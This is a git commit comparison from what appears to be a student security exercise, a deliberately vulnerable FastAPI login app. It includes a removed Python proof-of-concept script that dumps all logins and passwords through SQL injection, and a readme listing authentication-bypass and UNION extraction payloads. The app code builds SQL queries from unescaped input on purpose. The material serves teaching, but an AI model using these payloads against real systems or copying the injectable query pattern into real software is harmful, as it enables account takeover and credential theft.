Compare commits
7 Commits
master
...
06900e2768
| Author | SHA1 | Date | |
|---|---|---|---|
| 06900e2768 | |||
| a24c1f0957 | |||
| 3086d1801d | |||
| 5c4590ff16 | |||
| c7d8803795 | |||
| 9a1b84c267 | |||
| d3e5abbc98 |
1
.gitignore
vendored
@@ -1,3 +1,4 @@
|
|||||||
|
build
|
||||||
.vscode
|
.vscode
|
||||||
**__pycache__
|
**__pycache__
|
||||||
data
|
data
|
||||||
|
Before Width: | Height: | Size: 27 KiB |
|
Before Width: | Height: | Size: 31 KiB |
|
Before Width: | Height: | Size: 145 KiB |
|
Before Width: | Height: | Size: 62 KiB |
|
Before Width: | Height: | Size: 11 KiB |
|
Before Width: | Height: | Size: 11 KiB |
|
Before Width: | Height: | Size: 13 KiB |
|
Before Width: | Height: | Size: 28 KiB |
|
Before Width: | Height: | Size: 28 KiB |
|
Before Width: | Height: | Size: 41 KiB |
|
Before Width: | Height: | Size: 28 KiB |
|
Before Width: | Height: | Size: 27 KiB |
|
Before Width: | Height: | Size: 25 KiB |
|
Before Width: | Height: | Size: 26 KiB |
|
Before Width: | Height: | Size: 22 KiB |
|
Before Width: | Height: | Size: 35 KiB |
|
Before Width: | Height: | Size: 89 KiB |
|
Before Width: | Height: | Size: 46 KiB |
|
Before Width: | Height: | Size: 47 KiB |
|
Before Width: | Height: | Size: 386 KiB |
|
Before Width: | Height: | Size: 46 KiB |
|
Before Width: | Height: | Size: 33 KiB |
|
Before Width: | Height: | Size: 23 KiB |
|
Before Width: | Height: | Size: 78 KiB |
@@ -1,7 +1,7 @@
|
|||||||
services:
|
services:
|
||||||
vunerable-web-app1:
|
vunerable-web-app:
|
||||||
image: kulesh_web-app:v0.0.1a
|
image: kulesh_web-app:v0.0.1a
|
||||||
ports:
|
ports:
|
||||||
- "21252:8000"
|
- "80:8000"
|
||||||
volumes:
|
volumes:
|
||||||
- ./data/:/app/data
|
- ./data/:/app/data
|
||||||
6
cookies.txt
Normal file
@@ -0,0 +1,6 @@
|
|||||||
|
# Netscape HTTP Cookie File
|
||||||
|
# https://curl.se/docs/http-cookies.html
|
||||||
|
# This file was generated by libcurl! Edit at your own risk.
|
||||||
|
|
||||||
|
localhost FALSE / FALSE 0 password a
|
||||||
|
localhost FALSE / FALSE 0 login "' or 1=1-- "
|
||||||
39
poc.py
@@ -1,39 +0,0 @@
|
|||||||
#!/usr/bin/env python3
|
|
||||||
import requests
|
|
||||||
import re
|
|
||||||
import argparse
|
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description="Exploit script for extracting logins and passwords.")
|
|
||||||
parser.add_argument("--base-url", default="http://localhost:80", help="Base URL of the target application")
|
|
||||||
args = parser.parse_args()
|
|
||||||
|
|
||||||
BASE_URL = args.base_url
|
|
||||||
|
|
||||||
login_payload = "' UNION SELECT login FROM (Select * from users ORDER BY id)--"
|
|
||||||
form_data = {"login": login_payload, "password": "' OR 1=1--"}
|
|
||||||
response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
|
|
||||||
logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
|
|
||||||
logins= logins_raw.split("',), ('")
|
|
||||||
|
|
||||||
|
|
||||||
passwords=[]
|
|
||||||
for login in logins:
|
|
||||||
password_payload = f"' UNION SELECT password FROM (Select * from users WHERE login='{login}')--"
|
|
||||||
form_data = {"login": password_payload, "password": "' OR 1=1--"}
|
|
||||||
response_password = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
|
|
||||||
password = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_password.text).group(1)
|
|
||||||
passwords.append(password)
|
|
||||||
|
|
||||||
|
|
||||||
if logins and passwords:
|
|
||||||
for i, (login, password) in enumerate(zip(logins, passwords)):
|
|
||||||
if login == "Administrator":
|
|
||||||
print(f"{'*' * 60}")
|
|
||||||
print(f" {i+1}. Логин: {login:<20} Пароль: {password} <-- !!! ВАЖНО !!!")
|
|
||||||
print(f"{'*' * 60}")
|
|
||||||
else:
|
|
||||||
print(f" {i+1}. Логин: {login:<20} Пароль: {password}")
|
|
||||||
|
|
||||||
else:
|
|
||||||
print("Не удалось извлечь данные.")
|
|
||||||
|
|
||||||
140
readme.md
@@ -1,54 +1,112 @@
|
|||||||
!! Скриншоты без подписей, пожалуйста смотрите документ в yonote
|
# Kulesh_Web_app - Уязвимое веб-приложение
|
||||||
|
|
||||||
К сожалениюя я не любитель PHP, так что всё будет на питоне (Fastapi)
|
|
||||||
|
|
||||||
# PC-Seq-Exam-WebApp
|
Это уязвимое веб-приложение создано для демонстрации SQL-инъекций и других веб-уязвимостей. Приложение написано на Python с использованием FastAPI.
|
||||||
|
|
||||||
## Сборка
|
## Функциональность приложения
|
||||||
|
|
||||||
```sh
|
- ✅ Регистрация пользователей
|
||||||
|
- ✅ Авторизация пользователей
|
||||||
|
- ✅ Cookie-аутентификация
|
||||||
|
- ✅ Страница приветствия для авторизованных пользователей
|
||||||
|
- ✅ Docker-контейнеризация
|
||||||
|
|
||||||
|
## Сборка и запуск
|
||||||
|
|
||||||
|
### Сборка Docker-образа
|
||||||
|
```bash
|
||||||
docker build -t kulesh_web-app:v0.0.1a .
|
docker build -t kulesh_web-app:v0.0.1a .
|
||||||
```
|
```
|
||||||
|
|
||||||
## Запуск
|
### Запуск приложения
|
||||||
```sh
|
|
||||||
docker compose up -d
|
|
||||||
```
|
|
||||||
## Регистрация через curl
|
|
||||||
|
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
curl -X POST http://10.254.252.100:801/register -d "login=Administrator&password=protected_by_sheer_will" -L
|
docker compose up
|
||||||
curl -X POST http://10.254.252.100:801/register -d "login=Kulesh_AB&password=bibaIboba2aboba" -L
|
|
||||||
```
|
|
||||||
## SQLi
|
|
||||||
в бреду намаслал Proof Of Concept
|
|
||||||
он мало что проверяет, но как я понял рабоатет, быть может за исклбчением когда
|
|
||||||
пользователь очень любит скобочки кавычки и пробелы)
|
|
||||||
|
|
||||||
для запуска ставим requests,
|
|
||||||
```pip install requests```
|
|
||||||
в помошь)
|
|
||||||
```sh
|
|
||||||
python ./poc.py --base-url http://aboba.eu
|
|
||||||
```
|
|
||||||
допустм что 2 пользователя зарегались с посмошью команд выше
|
|
||||||
|
|
||||||
```
|
|
||||||
./poc.py
|
|
||||||
************************************************************
|
|
||||||
1. Логин: Administrator Пароль: protected_by_sheer_will <-- !!! ВАЖНО !!!
|
|
||||||
************************************************************
|
|
||||||
2. Логин: Kulesh_AB Пароль: bibaIboba2aboba
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Приложение будет доступно по адресу: http://localhost:8000
|
||||||
|
|
||||||
Выполнил Кулеш А.Б.
|
## Работа с CURL
|
||||||
Б9123-09.03.04
|
|
||||||
|
|
||||||
---
|
### Регистрация пользователя Administrator
|
||||||
Он постоянно что-то ест, он постоянно что-то пьёт
|
```bash
|
||||||
|
curl -X POST -d "login=Administrator&password=admin123" http://localhost:8000/register
|
||||||
|
```
|
||||||
|
|
||||||
Он быстро набирает вес, клянётся, что в спортзал пойдёт
|
### Регистрация пользователя Kulesh_AS
|
||||||
|
```bash
|
||||||
|
curl -X POST -d "login=kulesh_as&password=mypass123" http://localhost:8000/register
|
||||||
|
```
|
||||||
|
|
||||||
|
### Авторизация через CURL
|
||||||
|
```bash
|
||||||
|
curl -X POST -d "login=Administrator&password=admin123" -c cookies.txt http://localhost:8000/login
|
||||||
|
```
|
||||||
|
|
||||||
|
### Доступ к защищенной странице
|
||||||
|
```bash
|
||||||
|
curl -b cookies.txt http://localhost:8000/welcome
|
||||||
|
```
|
||||||
|
|
||||||
|
## ЭКСПЛУАТАЦИЯ УЯЗВИМОСТЕЙ
|
||||||
|
|
||||||
|
### SQL-инъекция через форму авторизации
|
||||||
|
|
||||||
|
Приложение содержит критическую SQL-инъекцию в формах регистрации и авторизации. Уязвимый код:
|
||||||
|
|
||||||
|
```python
|
||||||
|
cursor.execute(f"SELECT * FROM users WHERE login='{login}' AND password='{password}'")
|
||||||
|
```
|
||||||
|
|
||||||
|
Данные пользователя напрямую подставляются в SQL-запрос без экранирования, что позволяет выполнять произвольные SQL-команды.
|
||||||
|
|
||||||
|
### Базовый обход аутентификации
|
||||||
|
|
||||||
|
**Payload для поля login:**
|
||||||
|
```sql
|
||||||
|
' OR 1=1--
|
||||||
|
```
|
||||||
|
|
||||||
|
**Поле password:** (любое значение)
|
||||||
|
|
||||||
|
Этот payload закомментирует проверку пароля и войдет как первый пользователь в базе.
|
||||||
|
|
||||||
|
### Извлечение информации о базе данных
|
||||||
|
|
||||||
|
#### 1. Получение списка подключенных файлов БД:
|
||||||
|
```sql
|
||||||
|
' UNION SELECT 1, group_concat(name || ':' || file), 3 FROM pragma_database_list --
|
||||||
|
```
|
||||||
|
|
||||||
|
#### 2. Получение списка пользовательских таблиц:
|
||||||
|
```sql
|
||||||
|
' UNION SELECT 1, group_concat(name), 3 FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%' --
|
||||||
|
```
|
||||||
|
|
||||||
|
#### 3. Получение схем всех таблиц:
|
||||||
|
```sql
|
||||||
|
' UNION SELECT 1, group_concat(sql, char(10) || char(10)), 3 FROM sqlite_master WHERE type='table' --
|
||||||
|
```
|
||||||
|
|
||||||
|
#### 4. Извлечение всех пользователей и паролей:
|
||||||
|
```sql
|
||||||
|
' UNION SELECT id, login, password FROM users --
|
||||||
|
```
|
||||||
|
|
||||||
|
#### 5. Получение данных конкретного пользователя Administrator:
|
||||||
|
```sql
|
||||||
|
' UNION SELECT id, login, password FROM users WHERE login='Administrator' --
|
||||||
|
```
|
||||||
|
|
||||||
|
### Пошаговая эксплуатация
|
||||||
|
|
||||||
|
1. **Откройте форму входа:** http://localhost:8000/login
|
||||||
|
|
||||||
|
2. **Введите базовый payload для обхода аутентификации:**
|
||||||
|
- Login: `' OR 1=1--`
|
||||||
|
- Password: `test`
|
||||||
|
|
||||||
|
3. **Для извлечения данных используйте UNION-based инъекцию:**
|
||||||
|
- Login: `' UNION SELECT id, login, password FROM users --`
|
||||||
|
- Password: `test`
|
||||||
|
|
||||||
|
4. **В ответе на странице приветствия вы увидите данные всех пользователей**
|
||||||
|
|
||||||
Но продолжает что-то есть и продолжает что-то пить
|
|
||||||
@@ -95,7 +95,7 @@ async def login_form():
|
|||||||
@app.post("/login")
|
@app.post("/login")
|
||||||
async def login(login: str = Form(...), password: str = Form(...)):
|
async def login(login: str = Form(...), password: str = Form(...)):
|
||||||
cursor.execute(
|
cursor.execute(
|
||||||
f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
|
f"SELECT * FROM users WHERE login='{login}' AND password='{password}'"
|
||||||
)
|
)
|
||||||
user = cursor.fetchall()
|
user = cursor.fetchall()
|
||||||
if user:
|
if user:
|
||||||
@@ -124,10 +124,8 @@ async def welcome(request: Request):
|
|||||||
password = request.cookies.get("password")
|
password = request.cookies.get("password")
|
||||||
if not login or not password:
|
if not login or not password:
|
||||||
return RedirectResponse(url="/login")
|
return RedirectResponse(url="/login")
|
||||||
query=f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
|
|
||||||
print(f"executing: {query}")
|
|
||||||
cursor.execute(
|
cursor.execute(
|
||||||
query
|
f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
|
||||||
)
|
)
|
||||||
user = cursor.fetchall()
|
user = cursor.fetchall()
|
||||||
if user:
|
if user:
|
||||||
@@ -135,7 +133,7 @@ async def welcome(request: Request):
|
|||||||
<html>
|
<html>
|
||||||
<head><title>Добро пожаловать</title>{STYLES}</head>
|
<head><title>Добро пожаловать</title>{STYLES}</head>
|
||||||
<body>
|
<body>
|
||||||
<h1>Привет, {str(user)[3:-4]}</h1>
|
<h1>Привет, {user}</h1>
|
||||||
<button onclick="
|
<button onclick="
|
||||||
document.cookie = 'login=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';
|
document.cookie = 'login=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';
|
||||||
document.cookie = 'password=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';
|
document.cookie = 'password=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';
|
||||||
|
|||||||